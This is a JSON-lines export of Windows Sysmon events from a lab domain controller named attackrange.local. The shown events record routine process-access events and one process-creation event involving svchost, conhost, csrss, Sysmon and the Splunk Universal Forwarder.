C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.247","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4185,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.247\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.247","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4186,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.247\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.247","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4187,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.247\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.247","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4188,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.247\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-02F6-5F25-0000-0010042E0600}\r\nTargetProcessId: 5116\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.247","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-02F6-5F25-0000-0010042E0600}","TargetProcessId":"5116","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4189,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.935\r\nProcessGuid: {A837DB8D-02F6-5F25-0000-0010AC2F0600}\r\nProcessId: 4240\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.935","ProcessGuid":"{A837DB8D-02F6-5F25-0000-0010AC2F0600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4190,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.934\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-02F6-5F25-0000-0010AC2F0600}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.934","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-02F6-5F25-0000-0010AC2F0600}","TargetProcessId":"4240","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4191,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.934\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-02F6-5F25-0000-0010AC2F0600}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.934","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-02F6-5F25-0000-0010AC2F0600}","TargetProcessId":"4240","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4192,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:50.934\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:50.934","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
